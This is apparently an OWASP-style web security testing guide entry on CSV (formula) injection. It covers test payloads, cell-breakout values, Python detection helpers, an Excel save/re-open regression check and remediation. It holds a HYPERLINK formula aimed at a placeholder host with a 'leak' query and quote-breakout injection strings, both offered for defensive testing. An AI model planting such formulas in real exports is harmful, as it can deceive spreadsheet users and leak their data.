
Testing for CSV Injection

ID
WSTG-INPV-21

Summary

CSV Injection (also known as Formula Injection) occurs when an application embeds untrusted, user-controlled input in CSV (or other spreadsheet-compatible) exports and the resulting file is opened in a spreadsheet program (e.g., Microsoft Excel, LibreOffice Calc). Spreadsheet applications may interpret certain cell values as formulas, which can lead to user deception (phishing-style workflows), manipulation of spreadsheet output, or data exfiltration. In some environments, formula injection can be escalated through spreadsheet “gadgets” and legacy features (e.g., DDE, Dynamic Data Exchange), potentially reaching command execution on the workstation that opens the file. Such escalation typically depends on client configuration and/or user interaction.

A key characteristic of this issue is that the vulnerability often manifests only when a user (e.g., an administrator or a member of the finance or support team) opens the exported file in a spreadsheet application.

Test Objectives

Identify CSV/spreadsheet export features that include untrusted input.
Verify whether attacker-controlled values are interpreted as formulas when the export is opened in common spreadsheet applications.
Check whether separator/quote injection can move a dangerous prefix to the start of a cell.
Validate whether mitigations remain effective in Microsoft Excel after saving and re-opening the CSV.
Assess practical impact based on who opens the export and how it is used.

How to Test

Formula-Triggering Prefixes

Cells beginning with the following characters may be interpreted as formulas by spreadsheet software:

Equals (=)
Plus (+)
Minus (-)
At (@)
Tab (0x09)
Carriage return (0x0D)
Line feed (0x0A)
Full-width (double-byte) variants such as ＝, ＋, －, ＠ (depending on locale/application behavior)
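
The prefixes listed above can be captured in a small helper for use in test scripts. This is a minimal sketch, not an authoritative list: the names FORMULA_TRIGGERS and starts_with_formula_trigger are illustrative, and the full-width code points are included on the assumption that the target application normalizes them.

```python
# Characters from the list above that may cause a spreadsheet
# to treat a cell as a formula.
FORMULA_TRIGGERS = (
    "=", "+", "-", "@",                      # ASCII prefixes
    "\t", "\r", "\n",                        # tab, carriage return, line feed
    "\uff1d", "\uff0b", "\uff0d", "\uff20",  # full-width = + - @
)


def starts_with_formula_trigger(cell: str) -> bool:
    """Return True if the cell's first character is a formula-triggering prefix."""
    # str.startswith accepts a tuple and returns False for an empty string.
    return cell.startswith(FORMULA_TRIGGERS)
```

Note that this check also flags legitimate values such as negative numbers (for example, -5), so it is better suited to spotting candidates for manual review than to acting as a final verdict.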

Important (Excel behavior): Microsoft Excel may remove quotes or escape characters from CSV cells when a file is saved and re-opened. As a result, some commonly suggested mitigations can fail after a save and re-open cycle, and previously escaped formulas may become active again.

Also note that it is not sufficient to ensure the overall untrusted input does not start with a dangerous character. Attackers may inject separators and quoting to start a new cell, placing the dangerous character at the beginning of a cell.

Identify CSV Export Functionality and Data Sources

Locate features that generate CSV/TSV or “export to spreadsheet” content:

Reports (users, transactions, audit logs, tickets)
Admin dashboards exporting lists
Email attachments generated by the application
Scheduled exports / integrations

Identify untrusted data sources that can end up in the export:

User profiles (name, email, company)
Free-text fields (comments, ticket subjects, notes)
Imported/integrated external data (webhooks, CRM sync, partner feeds)

Document which roles can trigger the export and which roles are likely to open it.

Place Benign, Detectable Formula-Like Values into Candidate Fields

Use harmless payloads to detect formula evaluation (avoid payloads that execute commands or perform uncontrolled network access). Test values that begin with each formula-triggering character:

=1+1
+1+1
-1+1
@SUM(1,1)
=HYPERLINK("http://example.invalid/leak?test=1", "Click Me")

Notes:

The HYPERLINK() case is useful to demonstrate realistic impact (deception/phishing-style flows, or potential metadata exposure when a link is clicked/opened). Use a controlled endpoint during testing (e.g., a local listener or an internal test host).
Do not use external “real attacker” infrastructure in validation.
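
A controlled endpoint for the HYPERLINK() case can be as simple as a local HTTP listener that records which paths were requested. The following is a minimal sketch using only the Python standard library; the names seen_requests, RecordingHandler, and start_listener, as well as the default host and port, are assumptions made for illustration.

```python
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

# Paths of the GET requests received so far (simple in-memory log).
seen_requests = []


class RecordingHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # Record the requested path, including any query string.
        seen_requests.append(self.path)
        self.send_response(204)  # No Content: nothing to render
        self.end_headers()

    def log_message(self, format, *args):
        pass  # silence the default per-request logging to stderr


def start_listener(host="127.0.0.1", port=8000):
    """Start the listener in a background thread and return the server object."""
    server = HTTPServer((host, port), RecordingHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server
```

With the listener started via start_listener(), a test value such as =HYPERLINK("http://127.0.0.1:8000/leak?test=1", "Click Me") should add /leak?test=1 to seen_requests when the link is followed on the same machine. To receive requests from other workstations, the listener would need to bind to an address on an internal test host instead of the loopback interface.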

Also test control-character and Unicode variants (where input handling allows it):

A value that begins with a tab character followed by =1+1 (TAB + =1+1)
Full-width prefix variants (e.g., ＝1+1)
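
The test values above can be generated programmatically so that each candidate field receives the same set. This is a sketch under stated assumptions: BASE_PAYLOADS, FULL_WIDTH, and build_test_values are hypothetical names, and only the leading character of each baseline payload is swapped for its full-width counterpart.

```python
# Baseline benign payloads, one per ASCII trigger character.
BASE_PAYLOADS = ["=1+1", "+1+1", "-1+1", "@SUM(1,1)"]

# Map ASCII trigger characters to their full-width counterparts.
FULL_WIDTH = str.maketrans(
    {"=": "\uff1d", "+": "\uff0b", "-": "\uff0d", "@": "\uff20"}
)


def build_test_values() -> list[str]:
    """Return the baseline payloads plus tab-prefixed and full-width variants."""
    values = list(BASE_PAYLOADS)
    values.append("\t=1+1")  # TAB + =1+1
    # Full-width variants: replace only the leading character.
    values.extend(p[0].translate(FULL_WIDTH) + p[1:] for p in BASE_PAYLOADS)
    return values
```

Whether the application accepts the tab or full-width characters at all depends on its input handling, so some of these values may be rejected or altered before they reach the export.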

Test Separator and Quote “Cell Breakout” Scenarios

Because CSV is cell-based, test whether you can inject content that starts a new cell and then begins with a dangerous character. This depends on:

Field separator (commonly , or ;)
Quoting rules and escaping
Application-side CSV generation and encoding

Example benign test patterns (adjust separator to the actual export format):

A value containing a quote and separator intended to create a new cell, then =1+1
A value containing a separator directly (if not quoted by the exporter), then =1+1

Your objective is to see whether the resulting CSV contains any cell whose first character is one of the formula-triggering prefixes. Verify this by inspecting the raw CSV output in a text editor.
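
The breakout scenarios above can be illustrated by comparing two hypothetical flawed exporters with one built on Python's csv module. This is a sketch only: naive_row and wrap_only_row are invented stand-ins for application-side bugs, not code from any real exporter, and the check covers only the four ASCII prefixes.

```python
import csv
import io

TRIGGERS = ("=", "+", "-", "@")


def naive_row(fields):
    """Hypothetical flawed exporter: joins fields with commas, no quoting."""
    return ",".join(fields)


def wrap_only_row(fields):
    """Hypothetical flawed exporter: wraps fields in quotes without doubling embedded quotes."""
    return ",".join('"' + f + '"' for f in fields)


def quoted_row(fields):
    """Exporter using the csv module, which quotes and escapes as needed."""
    buf = io.StringIO()
    csv.writer(buf).writerow(fields)
    return buf.getvalue().rstrip("\r\n")


def risky_cells(csv_line):
    """Parse one CSV line and return the cells whose first character is a trigger."""
    row = next(csv.reader([csv_line]))
    return [cell for cell in row if cell.startswith(TRIGGERS)]


# Neither input starts with a trigger character.
separator_payload = "Alice,=1+1"
quote_payload = 'x",=1+1,"y'

print(risky_cells(naive_row(["1", separator_payload, "note"])))    # ['=1+1']
print(risky_cells(wrap_only_row(["1", quote_payload, "note"])))    # ['=1+1']
print(risky_cells(quoted_row(["1", separator_payload, "note"])))   # []
print(risky_cells(quoted_row(["1", quote_payload, "note"])))       # []
```

Correct quoting prevents the breakout but does not neutralize a value that itself begins with a trigger character, so both checks are needed.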

Export and Verify in Spreadsheet Applications

Export/download the CSV.
Open it in at least one spreadsheet application used in the target environment (Excel and/or LibreOffice, etc.).
Confirm whether the cell is interpreted as a formula:
- The spreadsheet displays the computed result (e.g., 2) instead of the literal string (e.g., =1+1), and/or
- The formula bar shows a formula rather than plain text.

Record:

Application name and exact version or build (e.g., Microsoft Excel with its build number)
How the file was opened (double-click vs import wizard)
Whether locale settings influenced parsing

Excel Save/Re-open Regression Test (Mitigation Reliability)

If the application claims to escape/quote values:

Open the exported CSV in Microsoft Excel.
Save the file (e.g., as CSV).
Close and re-open it.
Re-check whether previously “neutralized” values became active formulas.

This step is critical because Excel may strip quoting or escape characters when it saves the file, so a value that was neutralized in the original export can become an active formula in the re-saved copy.
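
To support the save and re-open check above, the raw CSV from before and after the round trip can be compared for cells that newly begin with a trigger character. This is a minimal sketch: active_cells and newly_active are hypothetical helper names, only the four ASCII prefixes are checked, and the result complements rather than replaces visual confirmation in the spreadsheet application.

```python
import csv
import io

TRIGGERS = ("=", "+", "-", "@")


def active_cells(csv_text):
    """Return {(row, col): value} for cells whose first character is a trigger."""
    found = {}
    # newline="" lets the csv module handle line endings itself.
    for r, row in enumerate(csv.reader(io.StringIO(csv_text, newline=""))):
        for c, cell in enumerate(row):
            if cell.startswith(TRIGGERS):
                found[(r, c)] = cell
    return found


def newly_active(exported_text, resaved_text):
    """Return cells that start with a trigger only in the re-saved copy."""
    before = active_cells(exported_text)
    after = active_cells(resaved_text)
    return {pos: val for pos, val in after.items() if pos not in before}
```

In practice, both files would be read with open(path, newline="") and their contents passed to newly_active; any non-empty result points to cells worth re-checking in Excel. The comparison assumes the default comma separator, so exports using ; or tabs would need a delimiter argument passed to csv.reader.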

Assess Impact

Assess practical risk based on:

Who opens the file (privileged roles vs end users)
Whether exports are shared externally
Whether spreadsheet values are relied on for decisions (e.g., totals, flags, statuses)
Whether formulas could mislead users or trigger spreadsheet behaviors in your environment

Provide a clear reproduction path:

Where input is entered
How export is generated
Which program interprets it as a formula
Evidence (screenshot or description) that evaluation occurs

Higher-Impact Validation (Optional, Strictly Controlled)

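Some real-world cases show formula injection escalating beyond simple calculation or deception (e.g., via legacy spreadsheet features such as DDE). This behavior is highly environment-dependent: it typically relies on client configuration and/or user interaction, so any such validation should be limited to an isolated test environment.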

Remediation

There is no universal CSV sanitization strategy safe for all spreadsheet applications and downstream consumers. For CSVs intended for human viewing in spreadsheet software, apply a defense-in-depth approach:

Ensure no cell begins with formula-triggering characters (=, +, -, @) and relevant control/Unicode variants.
Consider per-field sanitization (commonly suggested):
- Wrap each cell in double quotes
- Prepend each cell with a single quote
- Escape double quotes by doubling them
  Note: This may not remain reliable in Microsoft Excel after saving and re-opening.
Excel-resistant mitigation (observed behavior):
- If a cell starts with =, +, -, or @, prefix the content with a tab character (0x09) inside a quoted field (e.g., "\t=1+1").
  Trade-off: The tab becomes part of the underlying data and may affect downstream programmatic imports.

Always validate the chosen mitigation against the spreadsheet applications and workflows in scope.
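
The tab-prefix approach described above could be sketched as follows using Python's csv module. This is an illustration under stated assumptions, not a complete sanitizer: neutralize and write_rows are hypothetical names, only the four ASCII prefixes are handled, and the control-character and Unicode variants would need separate treatment.

```python
import csv
import io

TRIGGERS = ("=", "+", "-", "@")


def neutralize(cell: str) -> str:
    """Prefix a tab when the cell starts with a formula-triggering character."""
    return "\t" + cell if cell.startswith(TRIGGERS) else cell


def write_rows(rows) -> str:
    """Serialize rows with every field quoted and embedded quotes doubled."""
    buf = io.StringIO()
    # QUOTE_ALL wraps each field in double quotes; the writer doubles
    # any embedded double quotes by default.
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL)
    for row in rows:
        writer.writerow([neutralize(str(value)) for value in row])
    return buf.getvalue()
```

For example, write_rows([["1", "=1+1"]]) produces a line in which the second field is a quoted tab followed by =1+1. Because the prefix is applied to any value starting with a minus sign, negative numbers also receive the tab, which is one concrete form of the downstream trade-off noted above.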

Tools

Intercepting proxy (e.g., Burp Suite, ZAP) to inject controlled values and reproduce the exact export workflow.
Spreadsheet software for validation in an isolated environment (e.g., Microsoft Excel, LibreOffice Calc).
A safe HTTP listener (local or internal test host) to observe clicks/requests when validating HYPERLINK() behavior.
A text editor to inspect the raw CSV and confirm whether any cell begins with a formula-triggering prefix.

References
